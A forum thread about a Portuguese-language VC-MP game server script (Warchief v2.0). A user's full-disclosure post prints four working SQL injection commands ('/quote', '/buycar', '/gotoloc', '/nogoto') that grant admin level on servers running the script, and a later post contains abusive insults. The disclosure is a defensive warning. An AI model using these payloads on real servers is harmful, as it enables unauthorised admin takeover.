HTC & Clan TOR - [0.4] Warchief v2.0
Build: 10156 (Update 25/07/2015)
Language: Portuguese-BR (The English version will be available soon)
Version [0.4] Warchief 2.0 additional controls and systems* MatheuS (Country Detector, mute, unmute) - sseebbyy (Nitrous Oxide Systems) - Banaqs (Vehicle Fix Function) - JaVeD (News System) - ADM Script v1.0 (Command format: Kick and Killp) - Diego (Ban and Unban) - Beztone (Command format: Setmon) - George (Gotoloc and Saveloc) - Ksna's Cops and Robbers (Special commands)
Updates will be released to fix bugs that still exist in this version
REMOVED - INSECURE
Can u tell me that from where did u find that mute and unmute system?
Quote from: KAKAN on Jul 25, 2015, 01:25 PMCan u tell me that from where did u find that mute and unmute system?
Quote from: HTC on Jul 25, 2015, 12:52 PMMatheuS (Country Detector, mute, unmute)
Warchief o.0 i might think it will be remove
I guess it will not be removed it has enough credits
Quote from: ThunderStorm on Jul 25, 2015, 01:54 PMQuote from: KAKAN on Jul 25, 2015, 01:25 PMCan u tell me that from where did u find that mute and unmute system?
Quote from: HTC on Jul 25, 2015, 12:52 PMMatheuS (Country Detector, mute, unmute)
I think I asked "where", not from "whom", caz the mute and unmute system aren't working fine
I do not remember having created no system mute and unmute. ???
lol milena por que colocou seu server aqui parou de jogar?
Quote from: [VSS]Shawn on Jul 25, 2015, 03:19 PMWarchief o.0 i might think it will be remove
Well it's
okay. It's just literally a straight port of the old Warchiefs (the commands still say they start with /c) but with a lot of other people's snippets duct taped onto it, but that's not a reason to take it down.
What I
am going to point out is that this script is amazingly vulnerable to SQL injection (http://forum.vc-mp.org/?topic=944.msg6101#msg6101). Since I'm already taking down the link because of this, here's a full disclosure:
You can easily gain admin rights on any server that runs this script by using any of these commands and rejoining:
Quote/quote '; UPDATE Account SET Level = 10 WHERE Name = 'YOUR_NAME_IN_LOWERCASE';--
/buycar '; UPDATE Account SET Level = 10 WHERE Name = 'YOUR_NAME_IN_LOWERCASE';--
/gotoloc '; UPDATE Account SET Level = 10 WHERE Name = 'YOUR_NAME_IN_LOWERCASE';--
/nogoto '; UPDATE Account SET Level = 10 WHERE Name = 'YOUR_NAME_IN_LOWERCASE';--
Virtually no user input is escaped using the escapeSQLString function in SQLite; consequently, these are a few commands that use user input and add them to the query without escaping, generating this flaw. I would absolutely not recommend using this until this script is largely fixed.
These problems will be corrected and on some days the server will be posted again
Who can give me this script pm me!
Quote from: UncleRus on Sep 26, 2020, 09:54 AMWho can give me this script pm me!
Idiotic, mentalism, and problematic people. Can you for god sake stop bumping topics and learn something at your own? You're continuously bumping the topics and begging for scripts which were either removed or link was expire. I've a 100% doubt that the scripts you released are full of trash and broken pieces of snippets taken from forum, and how did I know it? Because of your this infinite stupidness. I hope you regret it by any way.(ban maybe). This is the main reason people leaving this community cuz of stupid people like you.
Fuck off
Don't know why Storm forgot to lock this topic, perhaps he was expecting the topic creator to update and post a secure link...
Locked.